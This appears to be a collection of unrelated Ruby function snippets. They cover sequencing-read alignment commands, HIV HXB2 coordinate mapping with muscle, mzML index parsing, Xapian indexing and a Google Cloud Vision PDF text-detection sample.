"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def parseReferencePath(output)\n if(output.match(/BUILD_PATH=\\s+[Ss]equence/) ||\n output.match(/BUILD_PATH=[Ss]equence/))\n @refPath = \"sequence\"\n\n elsif(output.match(/BUILD_PATH=\\s+\\/data/) ||\n output.match(/BUILD_PATH=\\/data/))\n @refPath = output.slice(/\\/data\\/slx\\/references\\/\\S+/)\n \n # Since reference paths starting with /data/slx/references represent\n # format of reference paths in alkek, change the prefix of these paths\n # to match the file-system structure in ardmore.\n @refPath.gsub!(/\\/data\\/slx\\/references/,\n \"/stornext/snfs5/next-gen/Illumina/genomes\")\n\n elsif(output.match(/BUILD_PATH=\\s+\\/stornext/) ||\n output.match(/BUILD_PATH=\\/stornext/))\n # If LIMS already has correct path corresponding to the file\n # system structure in ardmore, return that path without any\n # modifications.\n @refPath = output.slice(/\\/stornext\\/\\S+/)\n end\n end",
"def step3g_fluctuation_source(path)\n return \"#{path.pathmap('%d')}/nreads.RData\"\nend",
"def open_index_file\n end",
"def get_default_data_processing_ids(io, index_list, lookback=300)\n hash = {}\n index_list.each_pair do |name, index|\n if index.size > 0\n # ^ we cannot quickly retrieve a defaultDataProcessingRef unless there\n # is at least one spectrum/chromatogram to start with. However, if\n # there is no spectrum/chromatogram, then the defaultDataProcessingRef\n # will not be needed either.\n io.bookmark do |io|\n io.pos = index[0] - lookback \n hash[name] = io.read(lookback)[/<#{name}List.*defaultDataProcessingRef=['\"](.*?)['\"]/m, 1]\n end\n end\n end\n hash\n end",
"def sequence_locator(seq=\"\",temp_dir=File.dirname($0))\n hxb2_ref = \"TGGAAGGGCTAATTCACTCCCAACGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGATCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGAGAAGTTAGAAGAAGCCAACAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGAATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACATGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCAGTGGCGCCCGAACAGGGACCTGAAAGCGAAAGGGAAACCAGAGGAGCTCTCTCGACGCAGGACTCGGCTTGCTGAAGCGCGCACGGCAAGAGGCGAGGGGCGGCGACTGGTGAGTACGCCAAAAATTTTGACTAGCGGAGGCTAGAAGGAGAGAGATGGGTGCGAGAGCGTCAGTATTAAGCGGGGGAGAATTAGATCGATGGGAAAAAATTCGGTTAAGGCCAGGGGGAAAGAAAAAATATAAATTAAAACATATAGTATGGGCAAGCAGGGAGCTAGAACGATTCGCAGTTAATCCTGGCCTGTTAGAAACATCAGAAGGCTGTAGACAAATACTGGGACAGCTACAACCATCCCTTCAGACAGGATCAGAAGAACTTAGATCATTATATAATACAGTAGCAACCCTCTATTGTGTGCATCAAAGGATAGAGATAAAAGACACCAAGGAAGCTTTAGACAAGATAGAGGAAGAGCAAAACAAAAGTAAGAAAAAAGCACAGCAAGCAGCAGCTGACACAGGACACAGCAATCAGGTCAGCCAAAATTACCCTATAGTGCAGAACATCCAGGGGCAAATGGTACATCAGGCCATATCACCTAGAACTTTAAATGCATGGGTAAAAGTAGTAGAAGAGAAGGCTTTCAGCCCAGAAGTGATACCCATGTTTTCAGCATTATCAGAAGGAGCCACCCCACAAGATTTAAACACCATGCTAAACACAGTGGGGGGACATCAAGCAGCCATGCAAATGTTAAAAGAGACCATCAATGAGGAAGCTGCAGAATGGGATAGAGTGCATCCAGTGCATGCAGGGCCTATTGCACCAGGCCAGATGAGAGAACCAAGGGGAAGTGACATAGCAGGAACTACTAGTACCCTTCAGGAACAAATAGGATGGATGACAAATAATCCACCTATCCCAGTAGGAGAAATTTATAAAAGATGGATAATCCTGGGATTAAATAAAATAGTAAGAATGTATAGCCCTACCAGCATTCTGGACATAAGACAAGGACCAAAGGAACCCTTTAGAGACTATGTAGACCGGTTCTATAAAACTCTAAGAGCCGAGCAAGCTTCACAGGAGGTAAAAAATTGGATGACAGAAACCTTGTTGGTCCAAAATGCGAACCCAGATTGTAAGACTATTTTAAAAGCATTGGGACCAGCGGCTACACTAGAAGAAATGATGACAGCATGTCAGGGAGTAGGAGGACCCGGCCATAAGGCAAGAGTTTTGGCTGAAGCAATGAGCCAAGTAACAAATTCAGCTACCATAATGATGCAGAGAGGCAATTTTAGGAACCAAAGAAAGATTGTTAAGTGTTTCAATTGTGGCAAAGAAGGGCACACAGCCAGAAATTGCAGGGCCCCTAGGAAAAAGGGCTGTTGGAAATGTGGAAAGGAAGGACACCAAATGAAAGATTGTACTGAGAGACAGGCTAATTTTTTAGGGAAGATCTGGCCTTCCTACAAGGGAAGGCCAGGGAATTTTCTTCAGAGCAGACCAGAGCCAACAGCCCCACCAGAAGAGAGCTTCAGGTCTGGGGTAGAGACAACAACTCCCCCTCAGAAGCAGGAGCCGATAGACAAGGAACTGTATCCTTTAACTTCCCTCAGGTCACTCTTTGGCAACGACCCCTCGTCACAATAAAGATAGGGGGGCAACTAAAGGAAGCTCTATTAGATACAGGAGCAGATGATACAGTATTAGAAGAAATGAGTTTGCCAGGAAGATGGAAACCAAAAATGATAGGGGGAATTGGAGGTTTTATCAAAGTAAGACAGTATGATCAGATACTCATAGAAATCTGTGGACATAAAGCTATAGGTACAGTATTAGTAGGACCTACACCTGTCAACATAATTGGAAGAAATCTGTTGACTCAGATTGGTTGCACTTTAAATTTTCCCATTAGCCCTATTGAGACTGTACCAGTAAAATTAAAGCCAGGAATGGATGGCCCAAAAGTTAAACAATGGCCATTGACAGAAGAAAAAATAAAAGCATTAGTAGAAATTTGTACAGAGATGGAAAAGGAAGGGAAAATTTCAAAAATTGGGCCTGAAAATCCATACAATACTCCAGTATTTGCCATAAAGAAAAAAGACAGTACTAAATGGAGAAAATTAGTAGATTTCAGAGAACTTAATAAGAGAACTCAAGACTTCTGGGAAGTTCAATTAGGAATACCACATCCCGCAGGGTTAAAAAAGAAAAAATCAGTAACAGTACTGGATGTGGGTGATGCATATTTTTCAGTTCCCTTAGATGAAGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCACAGGGATGGAAAGGATCACCAGCAATATTCCAAAGTAGCATGACAAAAATCTTAGAGCCTTTTAGAAAACAAAATCCAGACATAGTTATCTATCAATACATGGATGATTTGTATGTAGGATCTGACTTAGAAATAGGGCAGCATAGAACAAAAATAGAGGAGCTGAGACAACATCTGTTGAGGTGGGGACTTACCACACCAGACAAAAAACATCAGAAAGAACCTCCATTCCTTTGGATGGGTTATGAACTCCATCCTGATAAATGGACAGTACAGCCTATAGTGCTGCCAGAAAAAGACAGCTGGACTGTCAATGACATACAGAAGTTAGTGGGGAAATTGAATTGGGCAAGTCAGATTTACCCAGGGATTAAAGTAAGGCAATTATGTAAACTCCTTAGAGGAACCAAAGCACTAACAGAAGTAATACCACTAACAGAAGAAGCAGAGCTAGAACTGGCAGAAAACAGAGAGATTCTAAAA
GAACCAGTACATGGAGTGTATTATGACCCATCAAAAGACTTAATAGCAGAAATACAGAAGCAGGGGCAAGGCCAATGGACATATCAAATTTATCAAGAGCCATTTAAAAATCTGAAAACAGGAAAATATGCAAGAATGAGGGGTGCCCACACTAATGATGTAAAACAATTAACAGAGGCAGTGCAAAAAATAACCACAGAAAGCATAGTAATATGGGGAAAGACTCCTAAATTTAAACTGCCCATACAAAAGGAAACATGGGAAACATGGTGGACAGAGTATTGGCAAGCCACCTGGATTCCTGAGTGGGAGTTTGTTAATACCCCTCCCTTAGTGAAATTATGGTACCAGTTAGAGAAAGAACCCATAGTAGGAGCAGAAACCTTCTATGTAGATGGGGCAGCTAACAGGGAGACTAAATTAGGAAAAGCAGGATATGTTACTAATAGAGGAAGACAAAAAGTTGTCACCCTAACTGACACAACAAATCAGAAGACTGAGTTACAAGCAATTTATCTAGCTTTGCAGGATTCGGGATTAGAAGTAAACATAGTAACAGACTCACAATATGCATTAGGAATCATTCAAGCACAACCAGATCAAAGTGAATCAGAGTTAGTCAATCAAATAATAGAGCAGTTAATAAAAAAGGAAAAGGTCTATCTGGCATGGGTACCAGCACACAAAGGAATTGGAGGAAATGAACAAGTAGATAAATTAGTCAGTGCTGGAATCAGGAAAGTACTATTTTTAGATGGAATAGATAAGGCCCAAGATGAACATGAGAAATATCACAGTAATTGGAGAGCAATGGCTAGTGATTTTAACCTGCCACCTGTAGTAGCAAAAGAAATAGTAGCCAGCTGTGATAAATGTCAGCTAAAAGGAGAAGCCATGCATGGACAAGTAGACTGTAGTCCAGGAATATGGCAACTAGATTGTACACATTTAGAAGGAAAAGTTATCCTGGTAGCAGTTCATGTAGCCAGTGGATATATAGAAGCAGAAGTTATTCCAGCAGAAACAGGGCAGGAAACAGCATATTTTCTTTTAAAATTAGCAGGAAGATGGCCAGTAAAAACAATACATACTGACAATGGCAGCAATTTCACCGGTGCTACGGTTAGGGCCGCCTGTTGGTGGGCGGGAATCAAGCAGGAATTTGGAATTCCCTACAATCCCCAAAGTCAAGGAGTAGTAGAATCTATGAATAAAGAATTAAAGAAAATTATAGGACAGGTAAGAGATCAGGCTGAACATCTTAAGACAGCAGTACAAATGGCAGTATTCATCCACAATTTTAAAAGAAAAGGGGGGATTGGGGGGTACAGTGCAGGGGAAAGAATAGTAGACATAATAGCAACAGACATACAAACTAAAGAATTACAAAAACAAATTACAAAAATTCAAAATTTTCGGGTTTATTACAGGGACAGCAGAAATCCACTTTGGAAAGGACCAGCAAAGCTCCTCTGGAAAGGTGAAGGGGCAGTAGTAATACAAGATAATAGTGACATAAAAGTAGTGCCAAGAAGAAAAGCAAAGATCATTAGGGATTATGGAAAACAGATGGCAGGTGATGATTGTGTGGCAAGTAGACAGGATGAGGATTAGAACATGGAAAAGTTTAGTAAAACACCATATGTATGTTTCAGGGAAAGCTAGGGGATGGTTTTATAGACATCACTATGAAAGCCCTCATCCAAGAATAAGTTCAGAAGTACACATCCCACTAGGGGATGCTAGATTGGTAATAACAACATATTGGGGTCTGCATACAGGAGAAAGAGACTGGCATTTGGGTCAGGGAGTCTCCATAGAATGGAGGAAAAAGAGATATAGCACACAAGTAGACCCTGAACTAGCAGACCAACTAATTCATCTGTATTACTTTGACTGTTTTTCAGACTCTGCTATAAGAAAGGCCTTATTAGGACACATAGTTAGCCCTAGGTGTGAATATCAAGCAGGACATAACAAGGTAGGATCTCTACAATACTTGGCACTAGCAGCATTAATAACACCAAAAAAGATAAAGCCACCTTTGCCTAGTGTTACGAAACTGACAGAGGATAGATGGAACAAGCCCCAGAAGACCAAGGGCCACAGAGGGAGCCACACAATGAATGGACACTAGAGCTTTTAGAGGAGCTTAAGAATGAAGCTGTTAGACATTTTCCTAGGATTTGGCTCCATGGCTTAGGGCAACATATCTATGAAACTTATGGGGATACTTGGGCAGGAGTGGAAGCCATAATAAGAATTCTGCAACAACTGCTGTTTATCCATTTTCAGAATTGGGTGTCGACATAGCAGAATAGGCGTTACTCGACAGAGGAGAGCAAGAAATGGAGCCAGTAGATCCTAGACTAGAGCCCTGGAAGCATCCAGGAAGTCAGCCTAAAACTGCTTGTACCAATTGCTATTGTAAAAAGTGTTGCTTTCATTGCCAAGTTTGTTTCATAACAAAAGCCTTAGGCATCTCCTATGGCAGGAAGAAGCGGAGACAGCGACGAAGAGCTCATCAGAACAGTCAGACTCATCAAGCTTCTCTATCAAAGCAGTAAGTAGTACATGTAACGCAACCTATACCAATAGTAGCAATAGTAGCATTAGTAGTAGCAATAATAATAGCAATAGTTGTGTGGTCCATAGTAATCATAGAATATAGGAAAATATTAAGACAAAGAAAAATAGACAGGTTAATTGATAGACTAATAGAAAGAGCAGAAGACAGTGGCAATGAGAGTGAAGGAGAAATATCAGCACTTGTGGAGATGGGGGTGGAGATGGGGCACCATGCTCCTTGGGATGTTGATGATCTGTAGTGCTACAGAAAAATTGTGGGTCACAGTCTATTATGGGGTACCTGTGTGGAAGGAAGCAACCACCACTCTATTTTGTGCATCAGATGCTAAAGCATATGATACAGAGGTACATAATGTTTGGGCCACACATGCCTGTGTACCCACAGACCCCAACCCACAAGAAGTAGTATTGGTAAATGTGACAGAAAATTTTAACATGTGGAAAAATGACATGGTAGAACAGATGCATGAGGATATAATCAGTTTATGGGATCAAAGCCTAAAGCCATGTGTAAAATTAACCCCACTCTGTGTTAGTTTAAAGTGCACTGATTTGAAGAATGATACTAATACCAATAGTAGTAGCGGGAGAATGATAATGGAGAAAGGAGAGATAAAAAACTGCTCTTTCAATATCAGCACAAGCATAAGAGGTAAGGTGCAGAAAGAATATGCATTTTTTTATAAACTTGATATAATACCAATAGATAATGATACTACCAGCTATAAGTTGACAAGTTGTAACACCTCAGTCATTACACAGGCCTGTCCAAAGGTATCCTTTGAGCCAATTCCCATACATTATTGTGCCCCGGCTGGTTTTGCGATTCTAAAATGTAATAATAAGACGTTCAATGGAACAGGACCATGTACAAATGTCAGCACAGTACAATGTACACATGGAATTAGGCCAGTAGTATCAACTCAACTGCTGTTAAATGGCAGTCTAGCAGAAGAAGAGGTAGTA
ATTAGATCTGTCAATTTCACGGACAATGCTAAAACCATAATAGTACAGCTGAACACATCTGTAGAAATTAATTGTACAAGACCCAACAACAATACAAGAAAAAGAATCCGTATCCAGAGAGGACCAGGGAGAGCATTTGTTACAATAGGAAAAATAGGAAATATGAGACAAGCACATTGTAACATTAGTAGAGCAAAATGGAATAACACTTTAAAACAGATAGCTAGCAAATTAAGAGAACAATTTGGAAATAATAAAACAATAATCTTTAAGCAATCCTCAGGAGGGGACCCAGAAATTGTAACGCACAGTTTTAATTGTGGAGGGGAATTTTTCTACTGTAATTCAACACAACTGTTTAATAGTACTTGGTTTAATAGTACTTGGAGTACTGAAGGGTCAAATAACACTGAAGGAAGTGACACAATCACCCTCCCATGCAGAATAAAACAAATTATAAACATGTGGCAGAAAGTAGGAAAAGCAATGTATGCCCCTCCCATCAGTGGACAAATTAGATGTTCATCAAATATTACAGGGCTGCTATTAACAAGAGATGGTGGTAATAGCAACAATGAGTCCGAGATCTTCAGACCTGGAGGAGGAGATATGAGGGACAATTGGAGAAGTGAATTATATAAATATAAAGTAGTAAAAATTGAACCATTAGGAGTAGCACCCACCAAGGCAAAGAGAAGAGTGGTGCAGAGAGAAAAAAGAGCAGTGGGAATAGGAGCTTTGTTCCTTGGGTTCTTGGGAGCAGCAGGAAGCACTATGGGCGCAGCCTCAATGACGCTGACGGTACAGGCCAGACAATTATTGTCTGGTATAGTGCAGCAGCAGAACAATTTGCTGAGGGCTATTGAGGCGCAACAGCATCTGTTGCAACTCACAGTCTGGGGCATCAAGCAGCTCCAGGCAAGAATCCTGGCTGTGGAAAGATACCTAAAGGATCAACAGCTCCTGGGGATTTGGGGTTGCTCTGGAAAACTCATTTGCACCACTGCTGTGCCTTGGAATGCTAGTTGGAGTAATAAATCTCTGGAACAGATTTGGAATCACACGACCTGGATGGAGTGGGACAGAGAAATTAACAATTACACAAGCTTAATACACTCCTTAATTGAAGAATCGCAAAACCAGCAAGAAAAGAATGAACAAGAATTATTGGAATTAGATAAATGGGCAAGTTTGTGGAATTGGTTTAACATAACAAATTGGCTGTGGTATATAAAATTATTCATAATGATAGTAGGAGGCTTGGTAGGTTTAAGAATAGTTTTTGCTGTACTTTCTATAGTGAATAGAGTTAGGCAGGGATATTCACCATTATCGTTTCAGACCCACCTCCCAACCCCGAGGGGACCCGACAGGCCCGAAGGAATAGAAGAAGAAGGTGGAGAGAGAGACAGAGACAGATCCATTCGATTAGTGAACGGATCCTTGGCACTTATCTGGGACGATCTGCGGAGCCTGTGCCTCTTCAGCTACCACCGCTTGAGAGACTTACTCTTGATTGTAACGAGGATTGTGGAACTTCTGGGACGCAGGGGGTGGGAAGCCCTCAAATATTGGTGGAATCTCCTACAGTATTGGAGTCAGGAACTAAAGAATAGTGCTGTTAGCTTGCTCAATGCCACAGCCATAGCAGTAGCTGAGGGGACAGATAGGGTTATAGAAGTAGTACAAGGAGCTTGTAGAGCTATTCGCCACATACCTAGAAGAATAAGACAGGGCTTGGAAAGGATTTTGCTATAAGATGGGTGGCAAGTGGTCAAAAAGTAGTGTGATTGGATGGCCTACTGTAAGGGAAAGAATGAGACGAGCTGAGCCAGCAGCAGATAGGGTGGGAGCAGCATCTCGAGACCTGGAAAAACATGGAGCAATCACAAGTAGCAATACAGCAGCTACCAATGCTGCTTGTGCCTGGCTAGAAGCACAAGAGGAGGAGGAGGTGGGTTTTCCAGTCACACCTCAGGTACCTTTAAGACCAATGACTTACAAGGCAGCTGTAGATCTTAGCCACTTTTTAAAAGAAAAGGGGGGACTGGAAGGGCTAATTCACTCCCAAAGAAGACAAGATATCCTTGATCTGTGGATCTACCACACACAAGGCTACTTCCCTGATTAGCAGAACTACACACCAGGGCCAGGGGTCAGATATCCACTGACCTTTGGATGGTGCTACAAGCTAGTACCAGTTGAGCCAGATAAGATAGAAGAGGCCAATAAAGGAGAGAACACCAGCTTGTTACACCCTGTGAGCCTGCATGGGATGGATGACCCGGAGAGAGAAGTGTTAGAGTGGAGGTTTGACAGCCGCCTAGCATTTCATCACGTGGCCCGAGAGCTGCATCCGGAGTACTTCAAGAACTGCTGACATCGAGCTTGCTACAAGGGACTTTCCGCTGGGGACTTTCCAGGGAGGCGTGGCCTGGGCGGGACTGGGGAGTGGCGAGCCCTCAGATCCTGCATATAAGCAGCTGCTTTTTGCCTGTACTGGGTCTCTCTGGTTAGACCAGATCTGAGCCTGGGAGCTCTCTGGCTAACTAGGGAACCCACTGCTTAAGCCTCAATAAAGCTTGCCTTGAGTGCTTCAAGTAGTGTGTGCCCGTCTGTTGTGTGACTCTGGTAACTAGAGATCCCTCAGACCCTTTTAGTCAGTGTGGAAAATCTCTAGCA\"\n hxb2_l = hxb2_ref.size\n head = \"\"\n 8.times {head << (65 + rand(25)).chr}\n temp_file = temp_dir + \"/\" + head + \"_temp\"\n temp_aln = temp_dir + \"/\" + head + \"_temp_aln\"\n\n l1 = 0\n l2 = 0\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts hxb2_ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n\n begin\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n if ref_size > 1.3*(seq.size)\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n max_seq = aln_test2.scan(/[ACGT]+/).max_by(&:length)\n aln_test2 =~ /#{max_seq}/\n before_aln_seq = $`\n before_aln 
= $`.size\n post_aln_seq = $'\n post_aln = $'.size\n before_aln_seq_size = before_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b1 = (1.3 * before_aln_seq_size).to_i\n post_aln_seq_size = post_aln_seq.scan(/[ACGT]+/).join(\"\").size\n b2 = (1.3 * post_aln_seq_size).to_i\n if (before_aln > seq.size) and (post_aln <= seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1)]\n l1 = l1 + (before_aln - b1)\n elsif (post_aln > seq.size) and (before_aln <= seq.size)\n ref = ref[before_aln..(ref_size - post_aln - 1 + b2)]\n l2 = l2 + post_aln - b2\n elsif (post_aln > seq.size) and (before_aln > seq.size)\n ref = ref[(before_aln - b1)..(ref_size - post_aln - 1 + b2)]\n l1 = l1 + (before_aln - b1)\n l2 = l2 + (post_aln - b2)\n end\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test2 = $2\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n ref_size = ref.size\n end\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n\n if g1 == g2 and (s1 + g1 + s2) == ref.size\n if s1 > s2 and g2 > 2*s2\n ref = ref[0..(-g2-1)]\n repeat = 1\n l2 = l2 + g2\n elsif s1 < s2 and g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n else\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n\n while repeat == 1\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n aln_test =~ /^(\\-*)(\\w.*\\w)(\\-*)$/\n gap_begin = $1.size\n gap_end = $3.size\n aln_test = $2\n aln_test =~ /^(\\w+)(\\-*)\\w/\n s1 = $1.size\n g1 = $2.size\n aln_test =~ /\\w(\\-*)(\\w+)$/\n s2 = $2.size\n g2 = $1.size\n ref = aln_seq[\">ref\"]\n ref = ref[gap_begin..(-gap_end-1)]\n l1 = l1 + gap_begin\n l2 = l2 + gap_end\n repeat = 0\n if g1 > 2*s1\n ref = ref[g1..-1]\n repeat = 1\n l1 = l1 + g1\n end\n if g2 > 2*s2\n ref = ref[0..(-g2 - 1)]\n repeat = 1\n l2 = l2 + g2\n end\n end\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n #refine alignment\n\n if ref =~ /^(\\-+)/\n l1 = l1 - $1.size\n elsif ref =~ /(\\-+)$/\n l2 = l2 + $1.size\n end\n\n if (hxb2_l - l2 - 1) >= l1\n ref = hxb2_ref[l1..(hxb2_l - l2 - 1)]\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref\n temp_in.puts name\n temp_in.puts seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)\n aln_test = aln_seq[name]\n ref = aln_seq[\">ref\"]\n\n ref_size = 
ref.size\n sim_count = 0\n (0..(ref_size-1)).each do |n|\n ref_base = ref[n]\n test_base = aln_test[n]\n sim_count += 1 if ref_base == test_base\n end\n similarity = (sim_count/ref_size.to_f*100).round(1)\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n loc_p1 = l1 + 1\n loc_p2 = hxb2_l - l2\n if seq.size != (loc_p2 - loc_p1 + 1)\n indel = true\n elsif aln_test.include?(\"-\")\n indel = true\n else\n indel = false\n end\n return [loc_p1,loc_p2,similarity,indel,aln_test,ref]\n else\n return [0,0,0,0,0,0,0]\n end\n rescue\n print `rm -f #{temp_file}`\n print `rm -f #{temp_aln}`\n return [0,0,0,0,0,0,0]\n end\nend",
"def index(data_path, db_path)\n db = Xapian::WritableDatabase.new(db_path, Xapian::DB_CREATE_OR_OPEN)\n term_generator = Xapian::TermGenerator.new\n term_generator.stemmer = Xapian::Stem.new('en')\n parse_csv_file(data_path).each do |row|\n doc = Xapian::Document.new\n term_generator.document = doc\n term_generator.index_text(row['TITLE'].to_s, 1, 'S')\n term_generator.index_text(row['DESCRIPTION'].to_s, 1, 'XD')\n term_generator.index_text(row['TITLE'].to_s)\n term_generator.increase_termpos\n term_generator.index_text(row['DESCRIPTION'].to_s)\n\n ### Start of new indexing code.\n # Index the MATERIALS field, splitting on semicolons.\n row['MATERIALS'].to_s.split(';').each do |material|\n material.strip!\n material.downcase!\n doc.add_boolean_term(\"XM#{material}\") if material.length.positive?\n end\n ### End of new indexing code.\n\n doc.data = row.to_h.to_json\n idterm = \"Q#{row['id_NUMBER']}\"\n doc.add_boolean_term(idterm)\n db.replace_document(idterm, doc)\n end\nend",
"def prune_index\n# missing_files=index_time_dbm_file.reject{|filename,itime| File.exists?(filename) && Picolena::IndexedDirectories.any?{|dir,alias_path| filename.starts_with?(dir)}}\n# missing_files.each{|filename, itime|\n# index.writer.delete(:complete_path, filename)\n# index_time_dbm_file.delete(filename)\n# logger.debug \"Removed : #{filename}\"\n# }\n# index.optimize\n end",
"def detect_pdf_gcs gcs_source_uri:, gcs_destination_uri:\n # [START vision_text_detection_pdf_gcs]\n # [START vision_text_detection_pdf_gcs_migration]\n # gcs_source_uri = \"Google Cloud Storage URI, eg. 'gs://my-bucket/example.pdf'\"\n # gcs_destination_uri = \"Google Cloud Storage URI, eg. 'gs://my-bucket/prefix_'\"\n\n require \"google/cloud/vision\"\n require \"google/cloud/storage\"\n\n image_annotator = Google::Cloud::Vision::ImageAnnotator.new\n\n operation = image_annotator.document_text_detection(\n image: gcs_source_uri,\n mime_type: \"application/pdf\",\n batch_size: 2,\n destination: gcs_destination_uri,\n async: true\n )\n\n puts \"Waiting for the operation to finish.\"\n operation.wait_until_done!\n # [END vision_text_detection_pdf_gcs_migration]\n\n # Once the request has completed and the output has been\n # written to GCS, we can list all the output files.\n storage = Google::Cloud::Storage.new\n\n bucket_name, prefix = gcs_destination_uri.match(\"gs://([^/]+)/(.+)\").captures\n bucket = storage.bucket bucket_name\n\n # List objects with the given prefix.\n puts \"Output files:\"\n blob_list = bucket.files prefix: prefix\n blob_list.each do |file|\n puts file.name\n end\n\n # Process the first output file from GCS.\n # Since we specified a batch_size of 2, the first response contains\n # the first two pages of the input file.\n output = blob_list[0]\n json_string = output.download\n response = JSON.parse json_string.string\n\n # The actual response for the first page of the input file.\n first_page_response = response[\"responses\"][0]\n annotation = first_page_response[\"fullTextAnnotation\"]\n\n # Here we print the full text from the first page.\n # The response contains more information:\n # annotation/pages/blocks/paragraphs/words/symbols\n # including confidence scores and bounding boxes\n puts \"Full text:\\n#{annotation['text']}\"\n # [END vision_text_detection_pdf_gcs]\nend",
